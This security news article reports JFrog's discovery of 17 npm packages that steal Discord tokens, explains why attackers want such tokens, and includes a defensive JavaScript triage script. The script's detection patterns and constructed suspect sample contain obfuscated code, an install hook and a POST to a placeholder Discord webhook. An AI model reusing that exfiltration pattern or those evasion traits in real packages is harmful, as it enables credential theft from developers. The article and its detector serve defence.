JFrog discovers 17 new malicious npm packages
The JFrog Security research team continuously monitors popular open source software (OSS) repositories with automated tools and reports any discovered vulnerabilities or malicious packages to the repository operators and the wider community. Recently, 17 malicious packages were revealed in the PyPI repository, which shows that the attacks are becoming more and more sophisticated. The advanced evasion techniques used in the PyPI malware packages indicate a worrying trend: attackers are increasingly camouflaging their attacks on open source software.
The 17 malicious packages in the npm repository (the Node.js package manager), discovered by the automated scanning tools, deliberately target users' Discord tokens. A Discord token is a string of letters and numbers that serves as an authorization code for accessing Discord's servers, so a threat actor who obtains a victim's token has full access to that victim's Discord account. Fortunately, these packages were removed before they could accumulate a large number of downloads (according to the npm records), so a repeat of the last PyPI incident, in which malicious packages were downloaded tens of thousands of times before they were discovered and removed, was avoided.
The payloads of the packages are diverse, ranging from infostealers to complete backdoors for remote access. The packages also use different infection tactics, including typosquatting, dependency confusion and Trojan functionality.
Discord tokens popular with criminals
Recently there has been a wave of malware appropriating Discord tokens, previously reported in PyPI packages (for example, noblesse and DiscordSafety) and now also in the npm repository. Discord is a ubiquitous digital communication platform with over 350 million registered users that enables communication via voice calls, video calls, text messages and media files (or any other files), either privately (user to user) or in permanent virtual rooms called "servers". Against this background, the question arises: why do attackers steal Discord tokens?
During their research, JFrog's security researchers identified four "tempting" reasons:
1. Use of the Platform as part of an attack
Discord servers are often used as anonymous Command & Control (C2) servers that control a Remote Access Trojan (RAT) or even an entire botnet. Alternatively, Discord servers can be used as an anonymous exfiltration channel; previous research shows that the "Noblesse" malware family uses Discord webhooks to exfiltrate stolen data. If an attacker obtains credentials for Discord users or servers, the attack is better anonymized, since any activity performed with those credentials can be traced back to the legitimate user rather than to the attacker.
2. Spreading malware to Discord users
Hacked Discord accounts can be used for social engineering to spread malware further, either manually or automatically via a worm. A victim is much more likely to accept (and execute) a file from a friend's Discord account than a file sent by a complete stranger.
3. Sale of stolen premium accounts
Discord offers a premium service called "Discord Nitro". It unlocks various cosmetic options for the user (emojis, badges, etc.) as well as the ability to "boost" selected servers, which improves the call and video quality of streams on that server. Attackers could be targeting Discord accounts that bought Nitro in order to resell them cheaply on an online marketplace; this strategy can be observed, for example, on the marketplace playerup.com.
4. Easy availability of Discord token grabbers
Due to the popularity of this attack method, quite a lot of Discord token grabbers have been published on GitHub along with build instructions.
An attacker can take one of these templates and develop custom malware from it without extensive programming knowledge.
It is important to note that, compared with a full-fledged RAT backdoor, these payloads are less likely to be intercepted by antivirus solutions: a Discord stealer does not modify files, does not register itself anywhere (for example, to run again at the next startup) and does not perform suspicious operations such as creating child processes.
The malware found in the npm repository is very similar to the malicious packages that JFrog's earlier PyPI malware monitoring detected. As a rule, attackers use public hack tools with slight modifications (or even unmodified), obfuscated with public obfuscators.
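As an added illustration of the traits described above (webhook exfiltration, install-time execution, child processes and eval, public-obfuscator output), here is a small defender-side triage heuristic written for this article; it is not JFrog's scanner, and the rules, thresholds and the two sample packages are constructed.

```javascript
// Added example, not JFrog's tooling: heuristic static triage of an npm package for the
// stealer traits described above. Rules, weights, the threshold and the two sample
// packages below are constructed for illustration, not derived from real packages.
const SOURCE_RULES = [
  { id: 'discord-webhook', weight: 4, re: /discord(?:app)?\.com\/api\/webhooks\//i },
  { id: 'dynamic-eval',    weight: 2, re: /\b(?:eval|new Function)\s*\(/ },
  { id: 'child-process',   weight: 1, re: /require\(\s*['"]child_process['"]\s*\)/ },
];
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Density of javascript-obfuscator style artifacts (_0x identifiers, \x hex escapes)
// per KB of source; files under 1 KB are scored on raw counts.
function obfuscationScore(src) {
  const hexIds = (src.match(/_0x[0-9a-f]{4,}/gi) || []).length;
  const hexEsc = (src.match(/\\x[0-9a-f]{2}/gi) || []).length;
  return Math.round(((hexIds + hexEsc) / Math.max(1, src.length / 1024)) * 100) / 100;
}

// Scores one package from its package.json object and the concatenated JS source.
function triagePackage(manifest, src) {
  const findings = [];
  let score = 0;
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) { findings.push(`install-hook:${hook}`); score += 2; }
  }
  for (const rule of SOURCE_RULES) {
    if (rule.re.test(src)) { findings.push(rule.id); score += rule.weight; }
  }
  const obf = obfuscationScore(src);
  if (obf > 5) { findings.push(`obfuscated:${obf}/KB`); score += 3; }
  return { name: manifest.name, score, findings, verdict: score >= 6 ? 'review' : 'ok' };
}

// Constructed samples: a plain utility and a package showing the traits above.
const BENIGN = {
  manifest: { name: 'constructed-pad', version: '1.0.0', scripts: { test: 'node test.js' } },
  src: 'module.exports = (s, n) => String(s).padStart(n);\n',
};
const SUSPECT = {
  manifest: { name: 'constructed-suspect', version: '1.0.0', scripts: { postinstall: 'node index.js' } },
  src: [
    'var _0x4a1b=["\\x72\\x65\\x71\\x75\\x69\\x72\\x65","\\x66\\x73"];',
    'var fs=new Function("return "+_0x4a1b[0])()(_0x4a1b[1]);',
    'fetch("https://discord.com/api/webhooks/0000/CONSTRUCTED_PLACEHOLDER",{method:"POST"});',
  ].join('\n'),
};
console.log(triagePackage(BENIGN.manifest, BENIGN.src).verdict);   // ok
console.log(triagePackage(SUSPECT.manifest, SUSPECT.src));          // review, 4 findings
```

Such heuristics only raise packages for human review; a clean score is not proof of safety, since obfuscators and exfiltration channels change.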
At the moment there is a flood of malicious software hosted and distributed via open source software repositories. Public repositories have become a convenient tool for spreading malware: the repository's server is a trusted resource, and communication with it does not arouse suspicion from antivirus products or firewalls. In addition, the ease of installation via automation tools such as the npm client provides an ideal attack vector.
Revealing new malicious packages and the techniques used by malware authors increases the security of popular repositories. It is also recommended to take proactive precautions and to manage the use of npm through software curation, so that the risk of malicious code being introduced into companies is significantly reduced. In addition to detecting new vulnerabilities and threats, JFrog Xray's automatic security scanning provides developers and security teams with easy access to the latest relevant information about the software used in these scenarios.